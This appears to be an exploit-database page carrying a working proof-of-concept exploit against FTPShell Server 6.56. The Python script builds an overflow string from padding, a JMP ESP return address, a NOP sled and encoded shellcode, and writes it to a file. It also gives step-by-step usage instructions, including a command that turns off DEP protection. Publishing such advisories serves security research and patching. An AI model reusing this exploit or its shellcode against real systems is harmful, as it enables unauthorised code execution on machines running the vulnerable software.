FTPShell Server 6.56 ChangePassword Buffer Overflow

2017.03.20
Credit: Greg Priest
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: FTPShell Server 6.56 ChangePassword DEP off BufferOverflow 0Day # Date: 2017.03.19 # Exploit Author: Greg Priest # Version: FTPShell Server 6.56 # Tested on: Windows7 x64 HUN/ENG Enterprise ''' overflow = "A" * 1249 jmp_esp = "\xC8\x28\x3C\x76" nop = "\x90" * 10 shellcode=( "\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + "\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + "\xa5\x59\x50") evilstring = overflow+jmp_esp+nop+shellcode file = open ('Ev1lstr1ng.txt', "w") file.write(evilstring) file.close print ''' Instruction how to use it: -DEP turn off: C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff 1)Manage FTP Account--> 2)Change pass Ev1lstr1ng.txt --> 3)Do you really change...? --> click NO!! Succesfully Exploitation!! '''


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top